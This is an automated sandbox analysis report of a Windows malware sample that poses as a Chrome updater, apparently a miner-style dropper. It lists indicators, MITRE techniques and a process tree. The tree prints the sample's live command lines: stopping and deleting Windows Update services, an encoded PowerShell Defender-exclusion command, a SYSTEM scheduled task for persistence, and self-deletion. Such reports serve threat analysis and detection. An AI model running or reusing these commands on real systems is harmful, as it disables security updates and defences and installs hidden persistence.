16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b

Analysis

max time kernel
106s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
13-11-2022 19:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Size

2.6MB
MD5

c0827a7bd617a2fcd31a3d751152c2e0
SHA1

2d58f48e54e1c54e7b63e7ba2c9f50323994242a
SHA256

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b
SHA512

cbec23219a6084bc7226c5c86e34ecc17019224b1ccf55e35df899c50d896da358c7c2e1558f52aaf582f23520144b4541fb31c58e851251bed7dac364c09ad5
SSDEEP

49152:Y00kMwfXeTG2JpMpukZ6obih7GQtMKc+l3s7RjE+SsZa:YJkduTG2JQdZ6nhYK1cu3

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1812 created 420 1812 powershell.EXE winlogon.exe
PID 472 created 420 472 powershell.EXE winlogon.exe

description	pid	process	target process
PID 1812 created 420	1812	powershell.EXE	winlogon.exe
PID 472 created 420	472	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1168 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1292 takeown.exe
1452 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1908 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1096 taskeng.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1292 takeown.exe
1452 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

pid	process
1168	updater.exe

pid	process
1292	takeown.exe
1452	icacls.exe

pid	process
1908	cmd.exe

pid	process
1096	taskeng.exe

pid	process
1292	takeown.exe
1452	icacls.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.exepowershell.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1112 set thread context of 1864	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 1812 set thread context of 868	1812	powershell.EXE	dllhost.exe
PID 472 set thread context of 1820	472	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1212 sc.exe
1088 sc.exe
1436 sc.exe
1004 sc.exe
1716 sc.exe
1808 sc.exe
1860 sc.exe
1040 sc.exe
980 sc.exe
832 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1364 schtasks.exe

pid	process
1212	sc.exe
1088	sc.exe
1436	sc.exe
1004	sc.exe
1716	sc.exe
1808	sc.exe
1860	sc.exe
1040	sc.exe
980	sc.exe
832	sc.exe

pid	process
1364	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

updater.exepowershell.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00e5c3e7a1f7d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe

Modifies registry key 1 TTPs 13 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1760 reg.exe
1084 reg.exe
1860 reg.exe
764 reg.exe
536 reg.exe
964 reg.exe
1228 reg.exe
576 reg.exe
472 reg.exe
332 reg.exe
1228 reg.exe
1748 reg.exe
1968 reg.exe

pid	process
1760	reg.exe
1084	reg.exe
1860	reg.exe
764	reg.exe
536	reg.exe
964	reg.exe
1228	reg.exe
576	reg.exe
472	reg.exe
332	reg.exe
1228	reg.exe
1748	reg.exe
1968	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exeupdater.exe

pid	process
1856	powershell.exe
1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
1812	powershell.EXE
1812	powershell.EXE
868	dllhost.exe
868	dllhost.exe
472	powershell.EXE
868	dllhost.exe
868	dllhost.exe
1920	powershell.exe
472	powershell.EXE
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1168	updater.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe
1820	dllhost.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exe16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exepowercfg.exetakeown.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeupdater.exe

description	pid	process
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	300	powercfg.exe
Token: SeShutdownPrivilege	1536	powercfg.exe
Token: SeShutdownPrivilege	1912	powercfg.exe
Token: SeDebugPrivilege	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
Token: SeShutdownPrivilege	588	powercfg.exe
Token: SeTakeOwnershipPrivilege	1292	takeown.exe
Token: SeDebugPrivilege	1812	powershell.EXE
Token: SeDebugPrivilege	1812	powershell.EXE
Token: SeDebugPrivilege	868	dllhost.exe
Token: SeDebugPrivilege	472	powershell.EXE
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	472	powershell.EXE
Token: SeDebugPrivilege	1820	dllhost.exe
Token: SeShutdownPrivilege	1952	powercfg.exe
Token: SeShutdownPrivilege	1216	powercfg.exe
Token: SeShutdownPrivilege	1372	powercfg.exe
Token: SeShutdownPrivilege	1464	powercfg.exe
Token: SeDebugPrivilege	1168	updater.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.execmd.execmd.exe

description	pid	process	target process
PID 1112 wrote to memory of 1856	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 1112 wrote to memory of 1856	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 1112 wrote to memory of 1856	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 1112 wrote to memory of 1980	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1112 wrote to memory of 1980	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1112 wrote to memory of 1980	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1112 wrote to memory of 1992	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1112 wrote to memory of 1992	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1112 wrote to memory of 1992	1112	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	cmd.exe
PID 1980 wrote to memory of 1212	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1212	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1212	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 980	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 980	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 980	1980	cmd.exe	sc.exe
PID 1992 wrote to memory of 300	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 300	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 300	1992	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 832	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 832	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 832	1980	cmd.exe	sc.exe
PID 1992 wrote to memory of 1536	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1536	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1536	1992	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1436	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1436	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1436	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1004	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1004	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1004	1980	cmd.exe	sc.exe
PID 1980 wrote to memory of 1228	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1228	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1228	1980	cmd.exe	reg.exe
PID 1992 wrote to memory of 1912	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1912	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 1912	1992	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 1968	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1968	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1968	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1760	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1760	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1760	1980	cmd.exe	reg.exe
PID 1992 wrote to memory of 588	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 588	1992	cmd.exe	powercfg.exe
PID 1992 wrote to memory of 588	1992	cmd.exe	powercfg.exe
PID 1980 wrote to memory of 576	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 576	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 576	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1084	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1084	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1084	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1292	1980	cmd.exe	takeown.exe
PID 1980 wrote to memory of 1292	1980	cmd.exe	takeown.exe
PID 1980 wrote to memory of 1292	1980	cmd.exe	takeown.exe
PID 1980 wrote to memory of 1452	1980	cmd.exe	icacls.exe
PID 1980 wrote to memory of 1452	1980	cmd.exe	icacls.exe
PID 1980 wrote to memory of 1452	1980	cmd.exe	icacls.exe
PID 1980 wrote to memory of 1860	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1860	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 1860	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 472	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 472	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 472	1980	cmd.exe	reg.exe
PID 1980 wrote to memory of 764	1980	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{484ec1d7-7d07-4eee-99e9-e6085977c41c}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{3ad4bb9b-2eae-4d4b-92a6-4b886475773d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
"C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1212

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:980

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:832

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1436

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:1228

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1968

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:1760

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:576

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1084

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1292

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1452

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1860

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:472

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:764

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:332

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1388

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1612

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1820

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:1588

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1092

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:300

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Drops file in Windows directory
PID:1864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
2⤵
PID:300

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
- Creates scheduled task(s)
PID:1364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:1628

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
2⤵
- Deletes itself
PID:1908

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1764

C:\Windows\system32\taskeng.exe
taskeng.exe {B44F926E-3FBD-4BEB-8A47-F879209878AD} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1096

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
